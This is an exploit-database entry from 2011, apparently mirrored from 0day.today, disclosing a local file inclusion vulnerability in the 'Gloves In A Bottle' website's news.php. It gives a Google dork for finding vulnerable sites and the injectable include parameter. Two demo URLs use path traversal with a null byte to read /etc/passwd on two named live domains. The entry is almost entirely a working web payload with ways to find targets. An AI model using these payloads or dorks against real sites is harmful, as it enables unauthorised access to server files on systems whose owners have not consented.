id: 15958
date: 04/27/2011
title: Gloves In A Bottle Local File Inclusion Vulnerability
author: d3c0der
cves: 

###################################################################### 
# [+] Gloves In A Bottle Local File Inclusion
# [+] Google dork : Gloves In A Bottle, Inc. All rights reserved
# [+] Contact : d3c0der@hotmail.com - d3c0der.blogspot.com
# [+] special tnx : attackerz.ir , phc.ir 
#[-]-------------------------------------------------------------------------[-]
# 
# [+] Vulnerability
#
#     [+] path
#
#          http://[site]/news.php?include=[LFI]
#                 
#[-]-------------------------------------------------------------------------[-]
#
# [+] Demo
#
#  http://www.glovesinabottle.com/news.php?include=../../../../../etc/passwd%00
#  http://www.dry-skin.net/news.php?include=../../../../../etc/passwd%00
#  
#
######################################################################



#  0day.today [2023-03-24]  #